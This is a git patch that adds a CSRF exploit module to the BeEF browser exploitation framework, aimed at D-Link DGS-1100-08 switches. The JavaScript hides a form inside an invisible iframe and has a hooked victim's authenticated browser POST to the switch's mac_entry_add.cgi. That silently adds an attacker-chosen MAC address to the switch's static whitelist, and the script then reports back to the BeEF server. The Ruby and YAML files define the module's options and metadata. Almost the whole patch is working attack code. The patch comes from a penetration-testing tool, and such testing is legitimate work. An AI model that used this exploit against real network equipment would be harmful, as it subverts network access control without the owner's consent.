From 37b83e3a38770c32694fe14d08c3eb58a1c2df2d Mon Sep 17 00:00:00 2001 From: Nicholas Starke Date: Thu, 23 Feb 2017 19:23:45 -0600 Subject: [PATCH] Adding DLink DGS 110 DB Whitelist module --- .../dlink_dgs_1100_fdb_whitelist/command.js | 51 +++++++++++++++++++ .../dlink_dgs_1100_fdb_whitelist/config.yaml | 15 ++++++ .../dlink_dgs_1100_fdb_whitelist/module.rb | 21 ++++++++ 3 files changed, 87 insertions(+) create mode 100644 modules/exploits/switch/dlink_dgs_1100_fdb_whitelist/command.js create mode 100644 modules/exploits/switch/dlink_dgs_1100_fdb_whitelist/config.yaml create mode 100644 modules/exploits/switch/dlink_dgs_1100_fdb_whitelist/module.rb diff --git a/modules/exploits/switch/dlink_dgs_1100_fdb_whitelist/command.js b/modules/exploits/switch/dlink_dgs_1100_fdb_whitelist/command.js new file mode 100644 index 000000000..9398c804f --- /dev/null +++ b/modules/exploits/switch/dlink_dgs_1100_fdb_whitelist/command.js @@ -0,0 +1,51 @@ +// +// Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + // Hooked browser must be authenticated to switch. + var base = '<%= @base %>'; + var port = '<%= @port %>'; + var mac = '<%= @mac %>'; + var vlanid = '<%= @vlanid %>'; + + var dlink_dgs_iframe = beef.dom.createInvisibleIframe(); + + var form = document.createElement('form'); + form.setAttribute('action', base + "/cgi/mac_entry_add.cgi"); + form.setAttribute('method', 'POST'); + + var input = null; + + input = document.createElement('input'); + input.setAttribute('type', 'hidden'); + input.setAttribute('name', 'fwdport'); + input.setAttribute('value', port); + form.appendChild(input); + + input = document.createElement('input'); + input.setAttribute('type', 'hidden'); + input.setAttribute('name', 'vid'); + input.setAttribute('value', vlanid); + form.appendChild(input); + + input = document.createElement('input'); + input.setAttribute('type', 'hidden'); + input.setAttribute('name', 'macaddr'); + input.setAttribute('value', mac); + form.appendChild(input); + + dlink_dgs_iframe.contentWindow.document.body.appendChild(form); + form.submit(); + + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); + + cleanup = function() { + document.body.removeChild(dlink_dgs_iframe); + } + + setTimeout("cleanup()", 15000); +}); + diff --git a/modules/exploits/switch/dlink_dgs_1100_fdb_whitelist/config.yaml b/modules/exploits/switch/dlink_dgs_1100_fdb_whitelist/config.yaml new file mode 100644 index 000000000..d9886257a --- /dev/null +++ b/modules/exploits/switch/dlink_dgs_1100_fdb_whitelist/config.yaml @@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + Dlink_dgs_1100_fdb_whitelist_csrf: + enable: true + category: ["Exploits", "Switch"] + name: "DLINK DGS 1100-08 FDB Whitelist CSRF" + description: "Adds a MAC Address to the FDB Static Unicast Whitelist." + authors: ["Nick Starke"] + target: + working: ["ALL"] diff --git a/modules/exploits/switch/dlink_dgs_1100_fdb_whitelist/module.rb b/modules/exploits/switch/dlink_dgs_1100_fdb_whitelist/module.rb new file mode 100644 index 000000000..fff974076 --- /dev/null +++ b/modules/exploits/switch/dlink_dgs_1100_fdb_whitelist/module.rb @@ -0,0 +1,21 @@ +# +# Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Dlink_dgs_1100_fdb_whitelist_csrf < BeEF::Core::Command + + def self.options + return [ + {'name' => 'base', 'ui_label' => 'Switch web root', 'value' => 'http://10.90.90.90'}, + {'name' => 'port', 'ui_label' => 'Switch port to add MAC address access to', 'value' => '1'}, + {'name' => 'mac', 'ui_label' => 'MAC address to whitelist', 'value' => '00-00-00-00-00-00'}, + {'name' => 'vlanid', 'ui_label' => 'VLAN to add rule to', 'value' => '1'} + ] + end + + def post_execute + save({'result' => @datastore['result']}) + end + +end